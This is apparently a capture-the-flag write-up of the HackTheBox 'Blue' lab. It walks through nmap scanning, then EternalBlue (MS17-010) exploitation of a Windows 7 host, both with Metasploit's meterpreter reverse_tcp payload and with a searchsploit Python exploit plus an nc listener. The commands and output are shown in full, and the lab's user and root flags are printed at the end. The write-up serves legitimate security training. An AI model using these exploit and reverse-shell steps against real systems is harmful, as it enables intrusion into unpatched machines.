TL;DR
This is a writeup on Blue which is a Windows box categorized as easy on HackTheBox, and is primarily based on the exploitation of the Eternal Blue MS17-010 exploit without requiring the need for any privilege escalation to obtain the root flag.
Walkthrough
This writeup explains both, exploitation with and without Metasploit.
Blue Writeup: Scanning Network
Let’s start off by running the usual initial nmap scan.
Nmap 7.91 scan initiated as: nmap -sC -sV -n -v -A -oN nmap.initial 10.129.73.158
Increasing send delay for 10.129.73.158 from 0 to 5 due to 195 out of 648 dropped probes since last increase.
Nmap scan report for 10.129.73.158
Host is up (0.17s latency).
Not shown: 991 closed ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
49157/tcp open msrpc Microsoft Windows RPC
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
Uptime guess: 0.006 days (since Wed Jun 2 11:34:09 2021)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=264 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|clock-skew: mean: -19m57s, deviation: 34m37s, median: 1s
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: haris-PC | NetBIOS computer name: HARIS-PC\x00
| Workgroup: WORKGROUP\x00
| System time: 2021-06-02T16:42:28+01:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-06-02T15:42:31
|_ start_date: 2021-06-02T15:34:23
TRACEROUTE (using port 1720/tcp)
HOP RTT ADDRESS
1 168.18 ms 10.10.14.1
2 168.38 ms 10.129.73.158
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .We have a plenty of open ports here. Although, Microsoft RPC on port 135, netbios-ssn on port 139 and Microsoft-DS (Directory Services) SMB on port 445 seem to be the juicy ones, along with the PC name being seen as “haris-PC”.
The version on port 445 says that this box is running “Windows 7 Professional 7601 SP1”, and with the box name itself “Blue” we can really look forward to expecting the EternalBlue (MS17-010) vulnerability here. Let’s just confirm it by running the available nmap scripts for SMB vulnerabilities.
In simple words, Server Message Block Protocol (SMB protocol) is basically a client-server communication protocol used for sharing access to files, printers, serial ports, and other resources on a network.
Checking for SMB vulnerabilities using Nmap scripts
We have the following list of nmap scripts targeted towards verifying any SMB vulnerabilities on the target.
PS- The above list also includes the MS17-010 vulnerability.
Let’s run these SMB targeted scripts on the target using nmap.
┌─[root@kali]─[~/Desktop/Blue HTB]
└──╼ nmap --script smb-vuln* -sV -v -p 139,445 10.129.156.45
Starting Nmap 7.91 ( https://nmap.org )
Nmap scan report for 10.129.156.45
Host is up (0.19s latency).
PORT STATE SERVICE VERSION
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
| https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
NSE: Script Post-scanning.
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/
Nmap done: 1 IP address (1 host up) scanned in 24.22 seconds
Raw packets sent: 6 (240B) | Rcvd: 3 (116B)Great! The box is vulnerable to the Eternal_Blue MS17-010 exploit as expected. Let’s move ahead with the exploitation phase using metasploit.
Blue Writeup: Exploitation (with Metasploit)
Firing up the Metasploit framework and using the MS17-010 exploit on the target.
Please note that your LHOST must be set to the HackTheBox VPN network IP address.
msf5 > search ms17-010
Matching Modules
# Name Disclosure Date Rank Check Description
---- --------------- ---- ----- -----------
0 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
1 auxiliary/scanner/smb/smb_ms17_010 normal No MS17-010 SMB RCE Detection
2 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
3 exploit/windows/smb/ms17_010_eternalblue_win8 2017-03-14 average No MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
4 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
5 exploit/windows/smb/smb_doublepulsar_rce 2017-04-14 great Yes SMB DOUBLEPULSAR Remote Code Execution
msf5 > use 2
msf5 exploit(windows/smb/ms17_010_eternalblue) > show options
Module options (exploit/windows/smb/ms17_010_eternalblue):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
RPORT 445 yes The target port (TCP)
SMBDomain . no (Optional) The Windows domain to use for authentication
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VERIFY_ARCH true yes Check if remote architecture matches exploit Target.
VERIFY_TARGET true yes Check if remote OS matches exploit Target.
Exploit target:
Id Name
-- ----
0 Windows 7 and Server 2008 R2 (x64) All Service Packs
msf5 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 10.129.156.45
msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit
[-] 10.129.156.45:445 - Exploit failed: The following options failed to validate: LHOST.
[*] Exploit completed, but no session was created.
msf5 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 10.10.14.53
LHOST => 10.10.14.53
msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit
[] Started reverse TCP handler on 10.10.14.53:4444 [] 10.129.156.45:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.129.156.45:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[] 10.129.156.45:445 - Scanned 1 of 1 hosts (100% complete) [] 10.129.156.45:445 - Connecting to target for exploitation.
[+] 10.129.156.45:445 - Connection established for exploitation.
[+] 10.129.156.45:445 - Target OS selected valid for OS indicated by SMB reply
[] 10.129.156.45:445 - CORE raw buffer dump (42 bytes) [] 10.129.156.45:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes
[] 10.129.156.45:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv [] 10.129.156.45:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1
[+] 10.129.156.45:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[] 10.129.156.45:445 - Trying exploit with 12 Groom Allocations. [] 10.129.156.45:445 - Sending all but last fragment of exploit packet
[] 10.129.156.45:445 - Starting non-paged pool grooming [+] 10.129.156.45:445 - Sending SMBv2 buffers [+] 10.129.156.45:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer. [] 10.129.156.45:445 - Sending final SMBv2 buffers.
[] 10.129.156.45:445 - Sending last fragment of exploit packet! [] 10.129.156.45:445 - Receiving response from exploit packet
[+] 10.129.156.45:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[] 10.129.156.45:445 - Sending egg to corrupted connection. [] 10.129.156.45:445 - Triggering free of corrupted buffer.
[] Sending stage (201283 bytes) to 10.129.156.45 [] Meterpreter session 1 opened (10.10.14.53:4444 -> 10.129.156.45:49158) at 2021-06-03 09:46:36 -0400
[+] 10.129.156.45:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.129.156.45:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.129.156.45:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
meterpreter > sysinfo
Computer : HARIS-PC
OS : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture : x64
System Language : en_GB
Domain : WORKGROUP
Logged On Users : 0
Meterpreter : x64/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > shell
Process 2904 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
whoami
nt authority\system
C:\Users> dir
dir
Volume in drive C has no label.
Volume Serial Number is A0EF-1911
Directory of C:\Users
21/07/2017 07:56
.
21/07/2017 07:56 ..
21/07/2017 07:56 Administrator
14/07/2017 14:45 haris
12/04/2011 08:51 Public
0 File(s) 0 bytes
5 Dir(s) 17,254,989,824 bytes free Oh man, this was pretty easy! We are right away AUTHORITY\SYSTEM .
Blue Writeup: Exploitation (without Metasploit)
Searching for the MS17-010 exploit.
Let’s create a copy of this exploit to our current directory. If you didn’t already know, instead of copying we can also specify the exploit ID along with the –mirror flag in searchsploit to create a copy of the exploit in the current directory.
After frisking through the exploit code, I figured the following alterations that were needed to be done.
- After a lil enumeration we found out that “guest” login is allowed on the machine, so we need to add ‘guest’ in the USERNAME field of the exploit.
- Creating a reverse shell payload using msfvenom, and specifying the path to this payload in the exploit.
Let’s now open a listener on port 4444
And run the MS17-010 python exploit.
┌─[root@kali]─[~/Desktop/BlueHTB]
└──╼ python 42315.py 10.129.159.0Getting a reverse shell.
┌─[root@kali]─[~/Desktop/BlueHTB]
└──╼ nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.10.14.6] from (UNKNOWN) [10.10.10.40] 49158
Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
nt authority\systemWe are AUTHORITY\SYSTEM . Let’s quickly retrieve the flags.
Blue Writeup: User Flag
C:\Users> cd haris\Desktop
C:\Users\haris\Desktop> type user.txt
4c546aea7dbee75cbd71de245c8deea9Blue Writeup: Root Flag
C:\Users> cd Administrator\Desktop\
C:\Users\Administrator\Desktop> type root.txt
ff548eb71e920ff6c08843ce9df4e717 Until next time, do checkout our other writeups here.
